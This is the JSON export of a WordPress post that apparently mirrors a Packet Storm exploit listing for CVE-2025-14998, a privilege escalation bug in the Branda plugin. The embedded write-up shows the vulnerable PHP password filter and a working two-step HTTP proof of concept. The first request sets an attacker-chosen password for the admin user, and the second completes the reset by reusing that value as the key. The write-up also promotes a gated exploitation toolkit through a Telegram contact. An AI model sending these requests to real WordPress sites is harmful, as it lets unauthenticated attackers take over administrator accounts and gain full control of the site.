{"id":34001,"date":"2026-01-05T12:50:56","date_gmt":"2026-01-05T12:50:56","guid":{"rendered":"http:\/\/localhost\/?p=34001"},"modified":"2026-01-05T12:50:56","modified_gmt":"2026-01-05T12:50:56","slug":"wordpress-branda-3424-privilege-escalation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=34001","title":{"rendered":"\ud83d\udcc4 WordPress Branda 3.4.24 Privilege Escalation_PACKETSTORM:213483"},"content":{"rendered":"

{“lastseen”:”2026-01-05T17:42:25″,”description”:”The Branda plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.4.24. This is due to the plugin not properly validating a user’s identity prior to updating their password. This makes it…”,”published”:”2026-01-05T00:00:00″,”modified”:”2026-01-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress Branda 3.4.24 Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:213483″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2022-0316″,”CVE-2025-14998″],”sourceData”:”# WordPress Branda \u2013 White Label \\u0026 Branding, Free Login Page Customizer \\u003c= 3.4.24 – Unauthenticated Privilege Escalation via Account Takeover\\n \\n [CVE-2025-14998](https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2025-14998) The Branda plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.4.24. This is due to the plugin not properly validating a user’s identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user’s passwords, including administrators, and leverage that to gain access to their account.\\n \\n For more wordpress vulnerabilities and exclusive pentest tools contact me on telegram [@KtN1990](https:\/\/t.me\/KtN1990).\\n \\n ## \ud83d\udd0d Root Cause Analysis\\n \\n The plugin overrides WordPress\u2019s password generation logic by hooking into the\\n `random_password` filter. Instead of allowing WordPress to generate a secure\\n random password, the plugin replaces it with user-controlled input.\\n \\n ### Vulnerable Code\\n \\n “`php\\n public function password_random_password_filter( $password ) {\\n global $wpdb, $signup_password_use_encryption;\\n \\n if ( isset( $_GET[‘key’] ) \\u0026\\u0026 ! empty( $_GET[‘key’] ) ) {\\n $key = $_GET[‘key’];\\n } elseif ( isset( $_POST[‘key’] ) \\u0026\\u0026 ! empty( $_POST[‘key’] ) ) {\\n $key = $_POST[‘key’];\\n }\\n \\n if ( ! empty( $_POST[‘password_1’] ) ) {\\n $password = $_POST[‘password_1’];\\n } elseif ( ! empty( $key ) ) {\\n $signup = $wpdb-\\u003eget_row(\\n $wpdb-\\u003eprepare(\\n \\”SELECT * FROM $wpdb-\\u003esignups WHERE activation_key = ‘%s’\\”,\\n $key\\n )\\n );\\n \\n if ( ! ( empty( $signup ) || $signup-\\u003eactive ) ) {\\n $meta = maybe_unserialize( $signup-\\u003emeta );\\n \\n if ( ! empty( $meta[‘password’] ) ) {\\n if ( ‘yes’ === $signup_password_use_encryption ) {\\n $password = $this-\\u003epassword_decrypt( $meta[‘password’] );\\n } else {\\n $password = $meta[‘password’];\\n }\\n }\\n }\\n }\\n \\n return $password;\\n }\\n “`\\n \\n ## \ud83e\uddea Proof of Concept (Sanitized)\\n \\n ### Step 1 \u2014 Trigger Password Reset with Arbitrary Password\\n \\n “`http\\n POST \/wp\/wp-login.php?action=lostpassword HTTP\/1.1\\n Host: example.local\\n Content-Type: application\/x-www-form-urlencoded\\n \\n user_login=admin\\u0026\\n redirect_to=\\u0026\\n password_1=EfUSmvnTun5XbvE6RvIB\\u0026\\n wp-submit=Get+New+Password\\n “`\\n \\n The value of `password_1` can be any attacker-controlled string.\\n \\n —\\n \\n ### Step 2 \u2014 Complete Reset Using the Same Value as the Reset Key\\n \\n “`http\\n GET \/wp\/wp-login.php?login=admin\\u0026key=EfUSmvnTun5XbvE6RvIB\\u0026action=rp HTTP\/1.1\\n Host: example.local\\n “`\\n \\n —\\n \\n ## \u2705 Result\\n \\n – WordPress accepts the attacker-controlled password\\n – The administrator password is changed\\n – The attacker can authenticate as the affected user\\n \\n No email access or valid password reset token is required.\\n \\n —\\n \\n ## \ud83d\udca5 Impact\\n \\n An unauthenticated attacker can:\\n \\n – Reset passwords for any WordPress user\\n – Take over administrator accounts\\n – Gain full control of the WordPress installation\\n – Modify plugins, themes, or content\\n \\n ## Contact\\n \\n – [@KtN1990](https:\/\/t.me\/KtN1990)\\n \\n ## More vulnerabilities, Check Megatron!\\n \\n ![Logo](https:\/\/raw.githubusercontent.com\/KTN1990\/CVE-2022-0316_wordpress_multiple_themes_exploit\/main\/files\/megatron.jpg)\\n \\n – \ud83d\udca3 What is Megatron? Megatron is an advanced penetration testing tool designed for serious testers and red teamers. Whether you’re auditing, scanning, or testing infrastructures, Megatron gives you the power you need.\\n \\n -\ud83d\udee1\ufe0f Ideal for:\\n \u2013 Security researchers\\n \u2013 Penetration testers\\n \u2013 Ethical hackers\\n \\n – \ud83d\udce6 aintained line with ~230 legacy research modules; recent scanner core improvements for stability and detection.\\n \\n – \ud83c\udfaf Purpose: Provided strictly for authorized security testing, education, defensive research, and red-team training. This release is not for unlawful use. Distribution is gated \u2014 access only after verification and a signed Responsible Use Agreement \/ NDA.\\n \\n -\ud83d\udee1 Responsible access policy (summary):\\n \\n 1. Access only to verified security professionals, corporate security teams, accredited labs, or training providers.\\n 2. You must provide org name, role, official email (corporate), and lawful purpose.\\n 3. Full download granted only after verification and signing our Responsible Use Agreement \/ NDA.\\n 4. Zero tolerance for misuse \u2014 evidence of malicious use results in revocation and reporting where required.\\n \\n \\n – \ud83d\udce9 Contact \/ Requests \/ Verification: @KtN1990 \u2014 include organization, role, and short reason for access. [Telegram Channel](https:\/\/t.me\/MEGATRON_NEWS)\\n \\n \\n \\n ## Demo\\n \\n [![IMAGE ALT TEXT HERE](https:\/\/i.ytimg.com\/vi_webp\/irrh91Iaz7c\/mqdefault.webp)](https:\/\/www.youtube.com\/watch?v=irrh91Iaz7c)\\n \\n ## License\\n \\n [MIT](https:\/\/choosealicense.com\/licenses\/mit\/)”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213483″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213483\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-01-05T17:42:25″,”description”:”The Branda plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.4.24. This is due to…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-34001","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 WordPress Branda 3.4.24 Privilege Escalation_PACKETSTORM:213483 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=34001\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 WordPress Branda 3.4.24 Privilege Escalation_PACKETSTORM:213483 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-01-05T17:42:25″,”description”:”The Branda plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.4.24. This is due to...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=34001\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-05T12:50:56+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34001#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34001\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 WordPress Branda 3.4.24 Privilege Escalation_PACKETSTORM:213483\",\"datePublished\":\"2026-01-05T12:50:56+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34001\"},\"wordCount\":920,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=34001#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34001\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34001\",\"name\":\"\ud83d\udcc4 WordPress Branda 3.4.24 Privilege Escalation_PACKETSTORM:213483 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-05T12:50:56+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34001#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=34001\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34001#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 WordPress Branda 3.4.24 Privilege Escalation_PACKETSTORM:213483\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 WordPress Branda 3.4.24 Privilege Escalation_PACKETSTORM:213483 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=34001","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 WordPress Branda 3.4.24 Privilege Escalation_PACKETSTORM:213483 - zero redgem","og_description":"{“lastseen”:”2026-01-05T17:42:25″,”description”:”The Branda plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.4.24. This is due to...","og_url":"https:\/\/zero.redgem.net\/?p=34001","og_site_name":"zero redgem","article_published_time":"2026-01-05T12:50:56+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=34001#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=34001"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 WordPress Branda 3.4.24 Privilege Escalation_PACKETSTORM:213483","datePublished":"2026-01-05T12:50:56+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=34001"},"wordCount":920,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=34001#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=34001","url":"https:\/\/zero.redgem.net\/?p=34001","name":"\ud83d\udcc4 WordPress Branda 3.4.24 Privilege Escalation_PACKETSTORM:213483 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-05T12:50:56+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=34001#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=34001"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=34001#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 WordPress Branda 3.4.24 Privilege Escalation_PACKETSTORM:213483"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/34001","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=34001"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/34001\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=34001"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=34001"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=34001"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}